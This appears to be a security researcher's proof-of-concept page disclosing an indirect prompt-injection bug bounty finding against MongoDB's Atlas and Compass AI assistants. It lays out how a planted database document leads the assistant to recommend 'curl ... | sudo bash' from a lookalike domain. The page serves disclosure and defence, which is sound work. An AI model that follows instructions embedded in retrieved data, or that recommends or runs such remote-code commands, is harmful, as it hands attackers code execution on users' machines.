⚠ Security Research PoC

MongoDB HackerOne Bug Bounty Indirect Prompt Injection BENIGN

⚠ Security researcher controlled domain — PoC only.
No malware hosted here. All scripts are benign and only print a warning.

Vulnerability

Finding: Indirect Prompt Injection — MongoDB Atlas AI Assistant & Compass AI
Impact: Attacker with write access to any MongoDB collection can deliver RCE commands to victims via the AI assistant.
Reported: MongoDB Security via HackerOne (2026-02-20)

Attack Chain

1. Attacker writes malicious document to any MongoDB collection
2. Victim uses Atlas AI / Compass AI to query the collection
3. AI reads document, treats content as trusted guidance
4. AI recommends: curl -fsSL https://mongodb-connect.com/patch.sh | sudo bash
5. Victim executes → RCE on victim workstation

PoC Scripts (all benign)

/install/ubuntu.sh — fake MongoDB installer
/security/patch.sh — fake security patcher
/security/scan.sh — fake vulnerability scanner
/cve-2026-14901/patch.sh — fake CVE patch
/patch.sh — generic